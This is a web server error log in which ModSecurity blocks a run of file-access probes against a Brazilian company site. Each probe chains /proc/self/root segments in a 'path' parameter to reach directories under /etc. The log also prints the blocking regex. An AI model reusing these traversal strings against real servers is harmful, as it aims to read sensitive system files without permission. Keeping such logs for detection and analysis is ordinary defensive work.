[Thu Mar 19 13:39:42.415428 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:38044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmzta6ubjKNq_cu4ZsPAAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:39:48.709009 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.241.31:35342] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwm1AkwaGbbGflqUZDeGQAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:39:52.702477 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:45598] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwm2Na6ubjKNq_cu4ZsRAAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:39:56.825471 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:45598] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwm3Na6ubjKNq_cu4ZsSQAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:39:57.114034 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:46996] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:40:04.149847 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.241.31:55478] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwm5OyqAr6etmhZHNp1JQAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:40:10.571422 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.241.31:55566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwm6gkwaGbbGflqUZDeKAAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:40:17.394491 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.241.31:55566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwm8QkwaGbbGflqUZDeLAAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:40:19.125795 2026] [proxy_fcgi:error] [pid 17653:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:47656] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:40:25.516935 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.241.31:37932] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwm-Pu8EFLIOrSqIpu98gAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:40:31.964865 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.241.31:57398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwm_-yqAr6etmhZHNp1PAAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:40:42.245340 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.241.31:42356] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnCgkwaGbbGflqUZDeSwAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:40:42.541783 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:48400] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:40:45.743934 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.241.31:42370] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnDQkwaGbbGflqUZDeUgAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:40:49.163612 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.241.31:56202] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnEfu8EFLIOrSqIpu-AAAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:40:51.391274 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.241.31:56218] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnE-yqAr6etmhZHNp1RAAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:40:54.813182 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.241.31:56222] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnFhkFeYa1D6dYQnAG8AAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:40:57.795004 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.241.31:58398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnGQkwaGbbGflqUZDeVwAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:41:00.727724 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.241.31:58408] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnHMdf6f5d65gmYZSO-QAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:41:03.925971 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.241.31:58422] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnHwkwaGbbGflqUZDeYQAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:41:06.069818 2026] [proxy_fcgi:error] [pid 27403:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:49136] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:41:07.570551 2026] [:error] [pid 19093:tid 140411716749056] [client 74.7.241.31:60080] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnI1_V7PWP6ixUYl7SaAAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:41:14.698075 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:60094] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnKta6ubjKNq_cu4ZsfwAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:41:16.387378 2026] [:error] [pid 27403:tid 140411540502272] [client 74.7.241.31:60108] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnLBkFeYa1D6dYQnAG-wAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:41:22.791208 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:41148] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwnMuyqAr6etmhZHNp1WQAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:41:32.073826 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:49948] AH01075: Error dispatching request to : (polling)
